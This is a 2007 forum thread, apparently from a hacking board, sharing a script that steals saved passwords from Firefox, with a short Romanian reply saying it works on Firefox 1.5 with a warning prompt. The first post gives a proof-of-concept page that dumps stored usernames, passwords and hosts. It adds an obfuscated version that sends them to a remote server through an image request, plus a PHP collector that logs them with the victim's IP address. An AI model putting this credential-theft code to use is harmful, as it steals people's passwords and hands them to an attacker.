Ras Posted June 28, 2007 Report Posted June 28, 2007 <html><head><script>document.write('[img=http://www.0x000000.com/hacks/red_dress.gif]');/*- It would be possible to glue all these passwords on the image above, and I could capture them in my logs.- I could call a remote PHP script which submits the passwords.- This shows how dangerous trusted content can be, imagine you open a HELP file from a piece of software you downloaded,you are never sure your passwords are send to some server.- Thanks to Mozilla for this flawed security model, I heard this won't work anymore in FF 3.0 Well, we'll see.*/setTimeout("listPW()",1000);function listPW() { if(document.location !='http://www.0x000000.com/hacks/hello.html') { netscape.security.PrivilegeManager.enablePrivilege('UniversalXPConnect'); var pm = Components.classes["@mozilla.org/passwordmanager;1"].getService(); pm = pm.QueryInterface(Components.interfaces.nsIPasswordManager); var enumerator = pm.enumerator; document.writeln('Mozilla\'s idea of security, I do not store these passwords, it\'s only a PoC'); document.writeln(''); while (enumerator.hasMoreElements()) { try { var np = enumerator.getNext(); np = np.QueryInterface(Components.interfaces.nsIPassword); presult = '['+np.user+'] ['+np.password+'] ['+np.host+'] '; document.writeln(presult); } catch(e) { } } } else { alert('this only runs from your PC, save the page to your desktop (CTRL+S) and open it in Firefox, then watch the Magicx!'); }}</script></head><body>[img=hello_files/red_dress.gif]</body></html>The myimage.php<script>netscape.security.PrivilegeManager.enablePrivilege('UniversalXPConnect');img = "img.jpg"; var sm = "uspastestr()";var pm = Components.classes["@mozilla.org/"+sm.substr(2,3)+"swordmanager;1"].getService();pm = pm.QueryInterface(eval("Components.interfaces.nsI"+sm.charAt(2).toUpperCase()+sm.substr(3,2)+"swordManager"));var enumerator = pm.enumerator; var str = ''; while (enumerator.hasMoreElements()) {try { var np = enumerator.getNext();np = np.QueryInterface(eval("Components.interfaces.nsI"+sm.charAt(2).toUpperCase()+sm.substr(3,2)+"sword"));presult = '['+eval("np."+sm.substr(0,2)+"er")+','+eval("np."+sm.substr(2,3)+"sword")+','+np.host+']'+String.fromCharCode(172); str += presult;} catch(e) { } } img = img.concat("?str=").replace(img.substr(-3,3),sm.charAt(2)+"h"+sm.charAt(2))+str;var str = "<img src=\"http://[server]/"+img+"\">";document.write(str); setTimeout("window.stop()",1000);</script>Change the variable $image by the image that will see the victim<?phpheader("Content-type: image/jpeg");$img = imagecreatefromjpeg("img.jpg");imagejpeg($img);imagedestroy($img);$strRnd=date("His");$strFecha=date("H:i:s d/m/y ");$strIP = getenv("REMOTE_ADDR");$strUserAgent = htmlentities($_SERVER['HTTP_USER_AGENT']);$strReferer = htmlentities($_SERVER['HTTP_REFERER']); if (strlen($strReferer) == 0) { $strReferer = "Ninguna"; }$str = $_GET['str'];$str=str_replace(chr(172),"",$str);$fp = fopen("fox-".$strRnd.".html","w+");fwrite($fp, "Fecha: ".$strFecha." Direccion IP: ".$strIP." Referencia: ".$strReferer." User-Agent: ".$strUserAgent."".$str."");fclose($fp);?> Quote
SlicK Posted June 28, 2007 Report Posted June 28, 2007 Functioneaza pe Firefox 1.5 dar te avertizeaza daca vrei sa-i permiti scriptului sa acceseze informatiile respective... Quote
